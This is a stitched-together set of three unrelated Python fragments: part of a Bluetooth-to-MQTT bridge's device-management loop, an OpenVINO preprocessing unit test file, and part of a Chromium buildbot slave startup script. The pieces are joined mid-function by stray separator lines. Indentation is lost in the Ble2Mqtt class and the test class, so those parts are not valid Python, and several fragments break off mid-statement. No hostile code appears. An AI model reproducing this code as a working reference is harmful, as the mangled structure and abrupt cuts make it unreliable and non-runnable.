                'unique_id': f'{name}_{device.dev_id}',
                'device': device_info,
            }
            icon = entity.pop('icon', None)
            if icon:
                result['icon'] = f'mdi:{icon}'
            entity.pop('topic', None)
            entity.pop('json', None)
            entity.pop('main_value', None)
            result.update(entity)
            return result

        messages_to_send = []
        # Every device additionally reports link quality as a sensor.
        # NOTE(review): this appends to the device's own entity list —
        # presumably send_device_config runs once per device; confirm it is
        # not re-entered, or 'linkquality' would be duplicated.
        sensor_entities = device.entities.get(SENSOR_DOMAIN, [])
        sensor_entities.append(
            {
                'name': 'linkquality',
                'unit_of_measurement': 'lqi',
                'icon': 'signal',
            },
        )
        entities = {
            **device.entities,
            SENSOR_DOMAIN: sensor_entities,
        }
        for cls, entities in entities.items():
            if cls in (BINARY_SENSOR_DOMAIN, SENSOR_DOMAIN):
                for entity in entities:
                    entity_name = entity['name']
                    state_topic = self._get_topic(
                        device.unique_id,
                        entity.get('topic', SENSOR_STATE_TOPIC),
                    )
                    config_topic = '/'.join((
                        CONFIG_MQTT_NAMESPACE,
                        cls,
                        device.dev_id,
                        entity_name,
                        'config',
                    ))
                    if entity.get('json') and entity.get('main_value'):
                        # JSON payload: expose main_value as the state and
                        # the whole payload as attributes.
                        state_topic_part = {
                            'json_attributes_topic': state_topic,
                            'state_topic': state_topic,
                            'value_template':
                                f'{{{{ value_json.{entity["main_value"]} }}}}',
                        }
                    else:
                        state_topic_part = {
                            'state_topic': state_topic,
                            'value_template':
                                f'{{{{ value_json.{entity_name} }}}}',
                        }
                    payload = json.dumps({
                        **get_generic_vals(entity),
                        **state_topic_part,
                    })
                    logger.debug(
                        f'Publish config topic={config_topic}: {payload}',
                    )
                    messages_to_send.append(
                        aio_mqtt.PublishableMessage(
                            topic_name=config_topic,
                            payload=payload,
                            qos=aio_mqtt.QOSLevel.QOS_1,
                            retain=True,
                        ),
                    )
            if cls == SWITCH_DOMAIN:
                for entity in entities:
                    entity_name = entity['name']
                    state_topic = self._get_topic(device.unique_id, entity_name)
                    command_topic = '/'.join((state_topic, device.SET_POSTFIX))
                    config_topic = '/'.join((
                        CONFIG_MQTT_NAMESPACE,
                        cls,
                        device.dev_id,
                        entity_name,
                        'config',
                    ))
                    payload = json.dumps({
                        **get_generic_vals(entity),
                        'state_topic': state_topic,
                        'command_topic': command_topic,
                    })
                    logger.debug(
                        f'Publish config topic={config_topic}: {payload}',
                    )
                    messages_to_send.append(
                        aio_mqtt.PublishableMessage(
                            topic_name=config_topic,
                            payload=payload,
                            qos=aio_mqtt.QOSLevel.QOS_1,
                            retain=True,
                        ),
                    )
                    # TODO: send real state on receiving status from a device
                    logger.debug(f'Publish initial state topic={state_topic}')
                    await self._mqtt_client.publish(
                        aio_mqtt.PublishableMessage(
                            topic_name=state_topic,
                            payload='OFF',
                            qos=aio_mqtt.QOSLevel.QOS_1,
                        ),
                    )
            if cls == LIGHT_DOMAIN:
                for entity in entities:
                    entity_name = entity['name']
                    state_topic = self._get_topic(device.unique_id, entity_name)
                    set_topic = self._get_topic(
                        device.unique_id,
                        entity_name,
                        device.SET_POSTFIX,
                    )
                    config_topic = '/'.join((
                        CONFIG_MQTT_NAMESPACE,
                        cls,
                        device.dev_id,
                        entity_name,
                        'config',
                    ))
                    payload = json.dumps({
                        **get_generic_vals(entity),
                        'schema': 'json',
                        'rgb': entity.get('rgb', True),
                        'brightness': entity.get('brightness', True),
                        'state_topic': state_topic,
                        'command_topic': set_topic,
                    })
                    logger.debug(
                        f'Publish config topic={config_topic}: {payload}',
                    )
                    messages_to_send.append(
                        aio_mqtt.PublishableMessage(
                            topic_name=config_topic,
                            payload=payload,
                            qos=aio_mqtt.QOSLevel.QOS_1,
                            retain=True,
                        ),
                    )
        await aio.gather(*[
            self._mqtt_client.publish(message)
            for message in messages_to_send
        ])
        # NOTE(review): flag presumably checked inside Device.handle to avoid
        # resending config — confirm.
        device.config_sent = True

    async def manage_device(self):
        """Reconnect loop: connect, subscribe, pump data until a task
        finishes or fails, clean up, back off, retry forever."""
        device = self.device
        logger.debug(f'Start managing device={device}')
        failure_count = 0
        missing_device_count = 0
        while True:
            # Taking and immediately releasing the restart lock makes this
            # loop wait for an in-progress bluetoothd restart to finish.
            async with BLUETOOTH_RESTARTING:
                logger.debug(f'[{device}] Check for lock')
            try:
                async with handle_ble_exceptions():
                    await device.connect()
                    initial_coros = []
                    if not device.is_passive:
                        if not device.DEVICE_DROPS_CONNECTION:
                            # Only watch for disconnects on devices expected
                            # to hold their connection.
                            initial_coros.append(device.disconnected_event.wait)
                        await device.get_device_data()
                        failure_count = 0
                        missing_device_count = 0
                    if device.subscribed_topics:
                        await self._mqtt_client.subscribe(*[
                            (
                                '/'.join((self._base_topic, topic)),
                                aio_mqtt.QOSLevel.QOS_1,
                            )
                            for topic in device.subscribed_topics
                        ])
                    logger.debug(f'[{device}] mqtt subscribed')
                    coros = [
                        *[coro() for coro in initial_coros],
                        device.handle(
                            self.publish_topic_callback,
                            send_config=self.send_device_config,
                        ),
                    ]
                    will_handle_messages = bool(device.subscribed_topics)
                    if will_handle_messages:
                        coros.append(
                            device.handle_messages(self.publish_topic_callback),
                        )
                    tasks = [aio.create_task(t) for t in coros]
                    logger.debug(f'[{device}] tasks are created')
                    # First task to return (disconnect, error, ...) cancels
                    # the rest.
                    await run_tasks_and_cancel_on_first_return(*tasks)
                    if device.disconnected_event.is_set():
                        logger.debug(f'{device} has disconnected')
                    finished = [t for t in tasks if not t.cancelled()]
                    await handle_returned_tasks(*finished)
            except aio.CancelledError:
                raise
            except KeyboardInterrupt:
                raise
            except ConnectionTimeoutError:
                missing_device_count += 1
                logger.error(
                    f'[{device}] connection problem, '
                    f'attempts={missing_device_count}',
                )
            except (ConnectionError, TimeoutError, aio.TimeoutError):
                missing_device_count += 1
                logger.exception(
                    f'[{device}] connection problem, '
                    f'attempts={missing_device_count}',
                )
            except ListOfConnectionErrors as e:
                # "Not found" errors count towards the missing-device limit,
                # anything else towards the generic failure limit.
                if 'Device with address' in str(e) and \
                        'was not found' in str(e):
                    missing_device_count += 1
                    logger.warning(
                        f'Error while connecting to {device}, {e} {repr(e)}, '
                        f'attempts={missing_device_count}',
                    )
                else:
                    # if isinstance(e, aio.TimeoutError) or \
                    #         'org.bluez.Error.Failed: Connection aborted' in \
                    #         str(e):
                    failure_count += 1
                    logger.warning(
                        f'Error while connecting to {device}, {e} {repr(e)}, '
                        f'failure_count={failure_count}',
                    )
                # sometimes LYWSD03MMC devices remain connected
                # and doesn't advert their presence.
                # If cannot find device for several attempts, restart
                # the bluetooth chip
                if missing_device_count >= device.CONNECTION_FAILURES_LIMIT:
                    logger.error(
                        f'Device {device} was not found for '
                        f'{missing_device_count} times. Restarting bluetooth.',
                    )
                    missing_device_count = 0
                    await restart_bluetooth()
            finally:
                try:
                    await aio.wait_for(device.close(), timeout=10)
                except aio.CancelledError:
                    raise
                except Exception:
                    logger.exception(f'{device} problem on device.close()')
                try:
                    # NOTE(review): `tasks` is unbound here when connect()
                    # fails before the tasks are created; the resulting
                    # NameError is swallowed by the blanket `except
                    # Exception` below — confirm this is intended.
                    canceled = []
                    for t in tasks:
                        if not t.done():
                            t.cancel()
                            canceled.append(t)
                    for t in canceled:
                        try:
                            t.result()
                        except aio.CancelledError:
                            pass
                except aio.CancelledError:
                    raise
                except Exception:
                    pass
            if failure_count >= FAILURE_LIMIT:
                await restart_bluetooth()
                failure_count = 0
            try:
                if not device.disconnected_event.is_set():
                    await aio.wait_for(
                        device.disconnected_event.wait(),
                        timeout=10,
                    )
            except aio.TimeoutError:
                logger.exception(f'{device} not disconnected in 10 secs')
            logger.debug(
                f'Sleep for {device.RECONNECTION_SLEEP_INTERVAL} secs to '
                f'reconnect to device={device}',
            )
            await aio.sleep(device.RECONNECTION_SLEEP_INTERVAL)
class Ble2Mqtt:
TOPIC_ROOT = 'ble2mqtt'
BRIDGE_TOPIC = 'bridge'
def __init__(
self,
host: str,
port: int = None,
user: ty.Optional[str] = None,
password: ty.Optional[str] = None,
reconnection_interval: int = 10,
loop: ty.Optional[aio.AbstractEventLoop] = None,
*,
base_topic,
mqtt_prefix,
) -> None:
self._mqtt_host = host
self._mqtt_port = port
self._mqtt_user = user
self._mqtt_password = password
self._base_topic = base_topic
self._mqtt_prefix = mqtt_prefix
self._reconnection_interval = reconnection_interval
self._loop = loop or aio.get_event_loop()
self._mqtt_client = aio_mqtt.Client(
client_id_prefix=f'{base_topic}_',
loop=self._loop,
)
self._device_managers: ty.Dict[Device, DeviceManager] = {}
self.availability_topic = '/'.join((
self._base_topic,
self.BRIDGE_TOPIC,
SENSOR_STATE_TOPIC,
))
self.device_registry: ty.List[Device] = []
async def start(self):
result = await run_tasks_and_cancel_on_first_return(
self._loop.create_task(self._connect_forever()),
self._loop.create_task(self._handle_messages()),
)
for t in result:
await t
async def close(self) -> None:
for device, manager in self._device_managers.items():
await manager.close()
if self._mqtt_client.is_connected:
try:
await self._mqtt_client.disconnect()
except aio.CancelledError:
| |
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from argparse import Namespace
from openvino.tools.mo.utils.error import Error
import numpy as np
try:
# pylint: disable=no-name-in-module,import-error
from openvino.tools.mo.back.preprocessing import apply_preprocessing
# pylint: disable=no-name-in-module,import-error
import openvino.runtime.opset8 as ops
from openvino.runtime import Model, Layout, PartialShape
except Exception:
print("No OpenVINO API available,"
"ensure to set correct PYTHONPATH when running these tests")
raise
def create_function2(shape1=[2, 2], shape2=[2, 2], dtype1=np.float32, dtype2=np.float32):
    """Build a two-input test Model: each branch is parameter -> Relu -> Result,
    with tensor names "inputN"/"inputNa" and "resN"/"resNa"."""
    # NOTE: mutable list defaults are kept for interface compatibility; the
    # shapes are never mutated, so sharing between calls is harmless.
    params = []
    results = []
    for idx, (shape, dtype) in enumerate(((shape1, dtype1), (shape2, dtype2)), start=1):
        param = ops.parameter(shape, dtype=dtype, name=f"input{idx}")
        param.get_output_tensor(0).set_names({f"input{idx}", f"input{idx}a"})
        act = ops.relu(param)
        res = ops.result(act, f"res{idx}")
        res.get_output_tensor(0).set_names({f"res{idx}", f"res{idx}a"})
        params.append(param)
        results.append(res)
    return Model(results=results, parameters=params, name="TestFunction")
def create_function1(shape1=[2, 2]):
    """Build a single-input test Model: input1 -> Relu -> Result, with tensor
    names "input1a"/"input1b" and "res1"/"res1a"."""
    param = ops.parameter(shape1, dtype=np.float32, name="input1")
    param.get_output_tensor(0).set_names({'input1a', 'input1b'})
    res = ops.result(ops.relu(param), "res1")
    res.get_output_tensor(0).set_names({'res1', 'res1a'})
    return Model(results=[res], parameters=[param], name="TestFunction")
def process_function(ov_function: Model, argv: Namespace):
    """Thin wrapper: apply MO preprocessing embedding to *ov_function* in place."""
    apply_preprocessing(ov_function=ov_function, argv=argv)
class TestPreprocessingMOC(unittest.TestCase):
def setUp(self):
    # No shared fixtures; each test builds its own model.
    pass
def check_constant(self, const_node, expected, shape=None):
    """Assert *const_node* is a Constant whose values are close to
    *expected* and, when *shape* is given, has exactly that shape."""
    self.assertEqual(const_node.get_type_name(), 'Constant')
    self.assertTrue(np.allclose(const_node.get_vector(), expected))
    if shape is not None:
        assert const_node.shape == PartialShape(shape)
def check_scale_constant(self, node, expected, shape=None):
    """Assert the constant input of a scale node matches *expected*.

    *node* is Divide or Multiply; a Multiply stores the reciprocal of the
    scale, so invert *expected* before comparing.
    """
    const_node = node.input(1).get_source_output().get_node()
    if node.get_type_name() != 'Divide':
        # np.asarray: callers pass plain lists, and `1. / [2.]` raises
        # TypeError; elementwise inversion needs an ndarray.
        expected = 1. / np.asarray(expected)
    self.check_constant(const_node, expected, shape)
def check_mean_constant(self, node, expected, shape=None):
    """Assert the constant input of a mean node matches *expected*.

    *node* is Subtract or Add; an Add stores the negated mean, so negate
    *expected* before comparing.
    """
    const_node = node.input(1).get_source_output().get_node()
    if node.get_type_name() != 'Subtract':
        # Fix: the original `-expected.toList()` raised AttributeError for
        # both lists and ndarrays (numpy spells it `tolist`), and negating
        # a list is invalid anyway. Negate elementwise via numpy.
        expected = -np.asarray(expected)
    self.check_constant(const_node, expected, shape)
def test_scale_single_value(self):
    """--scale 2.0 must insert a Divide/Multiply after every parameter."""
    argv = Namespace(mean_scale_values=None, scale=2.0)
    model = create_function2()
    process_function(ov_function=model, argv=argv)
    for param in model.get_parameters():
        consumer = list(param.output(0).get_target_inputs())[0].get_node()
        self.assertIn(consumer.get_type_name(), ('Divide', 'Multiply'))
        self.check_scale_constant(consumer, [2.0])
def test_scale_single_value_fp64(self):
    """Scale insertion must also work when input1 is fp64."""
    argv = Namespace(mean_scale_values=None, scale=2.0)
    model = create_function2(dtype1=np.float64)
    process_function(ov_function=model, argv=argv)
    for model_input in model.inputs:
        consumer = list(model_input.get_target_inputs())[0].get_node()
        self.assertIn(consumer.get_type_name(), ('Divide', 'Multiply'))
        self.check_scale_constant(consumer, [2.0])
def test_scale_single_value_fp16(self):
    """Scale insertion must also work when input1 is fp16.

    Only the node type is checked here (no constant-value check, unlike the
    fp32/fp64 variants — presumably due to fp16 precision; kept as-is).
    """
    argv = Namespace(mean_scale_values=None, scale=2.0)
    model = create_function2(dtype1=np.float16)
    process_function(ov_function=model, argv=argv)
    for model_input in model.inputs:
        consumer = list(model_input.get_target_inputs())[0].get_node()
        self.assertIn(consumer.get_type_name(), ('Divide', 'Multiply'))
def test_scale_vector(self):
    """A 1-element scale vector for input1 scales only input1."""
    argv = Namespace(mean_scale_values={'input1': {'scale': np.array([4.]), 'mean': None}}, scale=None)
    model = create_function2()
    process_function(ov_function=model, argv=argv)
    scaled = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(scaled.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(scaled, [4.0], shape=None)
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
def test_scale_vector3(self):
    """A 3-channel scale on an NCHW-like shape becomes a [1,3,1,1] constant."""
    argv = Namespace(mean_scale_values={'input1': {'scale': np.array([2., 4., 8.]), 'mean': None}}, scale=None)
    model = create_function2(shape1=[1, 3, 224, 224])
    process_function(ov_function=model, argv=argv)
    scaled = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(scaled.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(scaled, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
    # Verify that guessed layout (?C??) is not appeared in input1
    self.assertEqual(model.get_parameters()[0].layout, Layout())
def test_scale_vector4_layout(self):
    """With an explicit NHWC source layout the scale constant lands on the
    last axis, and the layout sticks to the parameter."""
    argv = Namespace(mean_scale_values={'input1': {'scale': np.array([2., 4., 8., 9.]), 'mean': None}},
                     layout_values={'input1': {'source_layout': 'nhwc'}},
                     scale=None)
    model = create_function2(shape1=[1, 3, 3, 4])  # Use layout to determine channels dim
    process_function(ov_function=model, argv=argv)
    scaled = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(scaled.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(scaled, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
    # Verify that layout (NHWC) is appeared in input1
    self.assertEqual(model.get_parameters()[0].layout, Layout('nhwc'))
def test_mean_single(self):
    """A scalar mean for input1 inserts a Subtract/Add after it only."""
    argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
    model = create_function2()
    process_function(ov_function=model, argv=argv)
    mean_node = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(mean_node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(mean_node, [4.0], shape=None)
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
def test_mean_single_fp64(self):
    """Mean insertion must also work when input1 is fp64."""
    argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
    model = create_function2(dtype1=np.float64)
    process_function(ov_function=model, argv=argv)
    mean_node = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(mean_node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(mean_node, [4.0], shape=None)
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
def test_mean_single_fp16(self):
    """Mean insertion must also work when input1 is fp16.

    Only the node type is checked here (no constant-value check, unlike the
    fp32/fp64 variants — presumably due to fp16 precision; kept as-is).
    """
    argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
    model = create_function2(dtype1=np.float16)
    process_function(ov_function=model, argv=argv)
    mean_node = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(mean_node.get_type_name(), ('Subtract', 'Add'))
    # Verify that input2 is not affected
    untouched = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
def test_mean_vector3(self):
    """A 3-channel mean on an NCHW-like shape becomes a [1,3,1,1] constant."""
    argv = Namespace(mean_scale_values={'input2': {'mean': np.array([2., 4., 8.]), 'scale': None}}, scale=None)
    model = create_function2(shape2=[1, 3, 224, 224])
    process_function(ov_function=model, argv=argv)
    mean_node = list(model.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(mean_node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(mean_node, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
    # Verify that input1 is not affected
    untouched = list(model.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(untouched.get_type_name(), 'Relu')
    # Verify that guessed layout (?C??) is not appeared in input2
    self.assertEqual(model.get_parameters()[1].layout, Layout())
def test_mean_scale(self):
    """Mean is applied before scale on input2 (matched via tensor name)."""
    argv = Namespace(
        mean_scale_values={'input2a': {'mean': np.array([1., 2., 3.]),
                                       'scale': np.array([2., 4., 8.])}},
        scale=None)
    function = create_function2(shape2=[1, 3, 224, 224])
    process_function(ov_function=function, argv=argv)
    params = function.get_parameters()
    # Subtract(mean) must be the first consumer of input2 ...
    node = list(params[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[1., 2., 3.], shape=[1, 3, 1, 1])
    # ... followed by Divide(scale).
    node = list(node.output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(node, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
    # input1 must still feed its Relu consumer directly.
    node = list(params[0].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(node.get_type_name(), 'Relu')
    # The internally guessed layout (?C??) must not leak into input2.
    self.assertEqual(params[1].layout, Layout())
def test_mean_scale_with_layout(self):
    """Mean/scale constants follow the explicit NHWC layout of input2."""
    argv = Namespace(
        mean_scale_values={'input2a': {'mean': np.array([1., 2., 3., 4.]),
                                       'scale': np.array([2., 4., 8., 9.])}},
        scale=None)
    function = create_function2(shape2=[1, 3, 3, 4])
    function.get_parameters()[1].layout = Layout("NHWC")
    process_function(ov_function=function, argv=argv)
    params = function.get_parameters()
    # Subtract(mean) comes first, broadcast over the trailing channel dim.
    node = list(params[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[1., 2., 3., 4.], shape=[1, 1, 1, 4])
    # ... then Divide(scale).
    node = list(node.output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(node, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
    # input1 must still feed its Relu consumer directly.
    node = list(params[0].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(node.get_type_name(), 'Relu')
    # The explicit layout must survive preprocessing.
    self.assertEqual(params[1].layout, Layout("NHWC"))
def test_mean_scale_with_layout_dynamic(self):
    """Explicit NHWC layout drives mean/scale even on a fully dynamic shape."""
    argv = Namespace(
        mean_scale_values={'input2a': {'mean': np.array([1., 2., 3., 4.]),
                                       'scale': np.array([2., 4., 8., 9.])}},
        scale=None)
    function = create_function2(shape2=[-1, -1, -1, -1])
    function.get_parameters()[1].layout = Layout("NHWC")
    process_function(ov_function=function, argv=argv)
    params = function.get_parameters()
    # Subtract(mean) comes first, broadcast over the trailing channel dim.
    node = list(params[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[1., 2., 3., 4.], shape=[1, 1, 1, 4])
    # ... then Divide(scale).
    node = list(node.output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(node, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
    # input1 must still feed its Relu consumer directly.
    node = list(params[0].output(0).get_target_inputs())[0].get_node()
    self.assertEqual(node.get_type_name(), 'Relu')
    # The explicit layout must survive preprocessing.
    self.assertEqual(params[1].layout, Layout("NHWC"))
def test_no_param_name(self):
    """Positional mean/scale pairs map onto the inputs in declaration order."""
    argv = Namespace(
        mean_scale_values=list(np.array(
            [(np.array([1., 2., 3.]), np.array([2., 4., 6.])),
             (np.array([7., 8., 9.]), None)],
            dtype='object')),
        scale=None)
    function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 224, 224, 3])
    process_function(ov_function=function, argv=argv)
    params = function.get_parameters()
    # input1: mean then scale, channels located at dim 1.
    node = list(params[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[1., 2., 3.], shape=[1, 3, 1, 1])
    node = list(node.output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(node, expected=[2., 4., 6.], shape=[1, 3, 1, 1])
    # input2: mean only, channels located at the last dim.
    node = list(params[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[7., 8., 9.], shape=[1, 1, 1, 3])
    # Guessed layouts must not be recorded on either parameter.
    self.assertEqual(params[0].layout, Layout())
    self.assertEqual(params[1].layout, Layout())
def test_no_param_name_single_value(self):
    """Positional values: scalar mean/scale entries need no channel guessing."""
    argv = Namespace(
        mean_scale_values=list(np.array(
            [(np.array([1.]), None),
             (np.array([2., 3., 4.]), np.array([5.]))],
            dtype='object')),
        scale=None)
    function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 224, 224, 3])
    process_function(ov_function=function, argv=argv)
    params = function.get_parameters()
    # input1: scalar mean only.
    node = list(params[0].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[1.], shape=None)
    # input2: per-channel mean followed by scalar scale.
    node = list(params[1].output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Subtract', 'Add'))
    self.check_mean_constant(node, expected=[2., 3., 4.], shape=[1, 1, 1, 3])
    node = list(node.output(0).get_target_inputs())[0].get_node()
    self.assertIn(node.get_type_name(), ('Divide', 'Multiply'))
    self.check_scale_constant(node, expected=[5.], shape=None)
def test_error_no_param_name_number_not_match(self):
    """Two inputs but only one positional mean/scale pair raises question 61."""
    argv = Namespace(mean_scale_values=[(np.array([2., 3.]), np.array([4.]))],
                     scale=None)
    function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
    with self.assertRaisesRegex(Error, '.*question.*61.*'):
        process_function(ov_function=function, argv=argv)
def test_mean_scale_error_no_node_name_found(self):
    """An unknown input name in mean_scale_values raises question 83."""
    msv = {'not_found': {'scale': np.array([1.]), 'mean': np.array([1.])}}
    function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
    with self.assertRaisesRegex(Error, '.*question.*83.*'):
        process_function(ov_function=function,
                         argv=Namespace(mean_scale_values=msv, scale=None))
def test_layout_error_no_node_name_found(self):
    """An unknown input name in layout_values raises question 83."""
    layouts = {'not_found': {'source_layout': 'nhwc'}}
    function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
    with self.assertRaisesRegex(Error, '.*question.*83.*'):
        process_function(ov_function=function,
                         argv=Namespace(layout_values=layouts, scale=None))
def test_error_dimension_mismatch(self):
    """A 4-element scale cannot be matched to a 3-channel input."""
    msv = {'input1': {'scale': np.array([1., 2., 3., 4.]), 'mean': None}}
    function = create_function2(shape1=[1, 3, 224, 224])
    with self.assertRaises(Exception):
        process_function(ov_function=function,
                         argv=Namespace(mean_scale_values=msv, scale=None))
def test_error_dimension_not_clear(self):
    """Ambiguous channel dimension (several dims equal 3) must raise."""
    msv = {'input1': {'scale': np.array([1., 2., 3.]), 'mean': None}}
    # Shape [1, 3, 3, 3]: it is not clear which '3' the scale applies to.
    function = create_function2(shape1=[1, 3, 3, 3])
    with self.assertRaises(Exception):
        process_function(ov_function=function,
                         argv=Namespace(mean_scale_values=msv, scale=None))
def test_error_dimension_mismatch_with_scale(self):
    """Mean and scale vectors of different lengths must raise."""
    msv = {'input1': {'scale': np.array([1., 2., 3., 4.]),
                      'mean': np.array([1., 2., 3.])}}
    function = create_function2(shape1=[1, 3, 4, 224])
    with self.assertRaises(Exception):
        process_function(ov_function=function,
                         argv=Namespace(mean_scale_values=msv, scale=None))
def test_error_guess_c_wrong_position_3d(self):
    """Channel guessing on a 3D shape with the match at a bad position raises."""
    msv = {'input1': {'scale': np.array([1., 2., 3.]),
                      'mean': np.array([1., 2., 3.])}}
    function = create_function2(shape1=[2, 3, 4])
    with self.assertRaises(Exception):
        process_function(ov_function=function,
                         argv=Namespace(mean_scale_values=msv, scale=None))
def test_error_guess_c_wrong_position_4d(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3.]),
'mean': np.array([1., 2., 3.])}},
scale=None)
function = create_function2(shape1=[1, 2, 3, 4])
with | |
not _CheckTwistdRuns(twistd_pid_file)):
print 'Spawning slave in %s' % bot_slavedir
subprocess.check_call(['make', 'start'], cwd=bot_slavedir)
if '--nodaemon' in sys.argv:
# Block on liveliness of the subdir buildbots if called with --nodaemon.
_CheckSubdirBuildbotLiveliness()
return True
def GetThirdPartyVersions(master):
    """Checks whether the master to which this slave belongs specifies particular
    versions of buildbot and twisted for its slaves to run. If not specified,
    this function returns default values.

    Returns a (buildbot_dir, twisted_dir) tuple naming third_party
    subdirectories.
    """
    # Defaults used when no master is given or the master has no overrides.
    bb_ver = 'buildbot_slave_8_4'
    tw_ver = 'twisted_10_2'
    if master:
        bb_ver = getattr(master, 'buildslave_version', bb_ver)
        tw_ver = getattr(master, 'twisted_version', tw_ver)
    print 'Using %s and %s' % (bb_ver, tw_ver)
    return (bb_ver, tw_ver)
def error(msg):
    """Prints msg to stderr and aborts the process with exit code 1."""
    print >> sys.stderr, msg
    sys.exit(1)
def GetBotoFilePath(build=BUILD_DIR):
    """Returns the path of the .boto gs credentials file under site_config."""
    site_config_dir = os.path.join(build, 'site_config')
    return os.path.join(site_config_dir, '.boto')
def UseBotoPath():
    """Mutate the environment to reference the prefered gs credentials.

    If build/site_config/.boto exists, point both gsutil (BOTO_CONFIG) and the
    legacy AWS_CREDENTIAL_FILE variable at it so child processes inherit it.
    """
    # Compute the path once instead of calling GetBotoFilePath() three times;
    # this also keeps the existence check and the exported value consistent.
    boto_path = GetBotoFilePath()
    # If the boto file exists, make sure gsutil uses this boto file.
    if os.path.exists(boto_path):
        os.environ['AWS_CREDENTIAL_FILE'] = boto_path
        os.environ['BOTO_CONFIG'] = boto_path
def main():
    """Bootstraps the environment and runs the buildbot slave via twistd.

    Builds sys.path/PYTHONPATH from third_party, sanitizes the OS environment
    per platform, exports master/slave identity variables, runs twistd, and
    finally marks the machine for reboot unless a shutdown/no_reboot marker
    prevents it.
    """
    # Use adhoc argument parsing because of twisted's twisted argument parsing.
    # Change the current directory to the directory of the script.
    os.chdir(SCRIPT_DIR)
    depot_tools = os.path.join(ROOT_DIR, 'depot_tools')
    if not os.path.isdir(depot_tools):
        error('You must put a copy of depot_tools in %s' % depot_tools)
    bot_password_file = os.path.normpath(
        os.path.join(BUILD_DIR, 'site_config', '.bot_password'))
    if not os.path.isfile(bot_password_file):
        error('You forgot to put the password at %s' % bot_password_file)
    if SpawnSubdirBuildbotsIfNeeded():
        # If subdir buildbots were used, don't spawn the root process.
        return
    # Make sure the current python path is absolute.
    old_pythonpath = os.environ.get('PYTHONPATH', '')
    os.environ['PYTHONPATH'] = ''
    for path in old_pythonpath.split(os.pathsep):
        if path:
            os.environ['PYTHONPATH'] += os.path.abspath(path) + os.pathsep
    # Update the python path.
    python_path = [
        os.path.join(BUILD_DIR, 'site_config'),
        os.path.join(BUILD_DIR, 'scripts'),
        os.path.join(BUILD_DIR, 'scripts', 'release'),
        os.path.join(BUILD_DIR, 'third_party'),
        os.path.join(BUILD_DIR, 'third_party', 'google_api_python_client'),
        os.path.join(BUILD_DIR, 'third_party', 'httplib2', 'python2'),
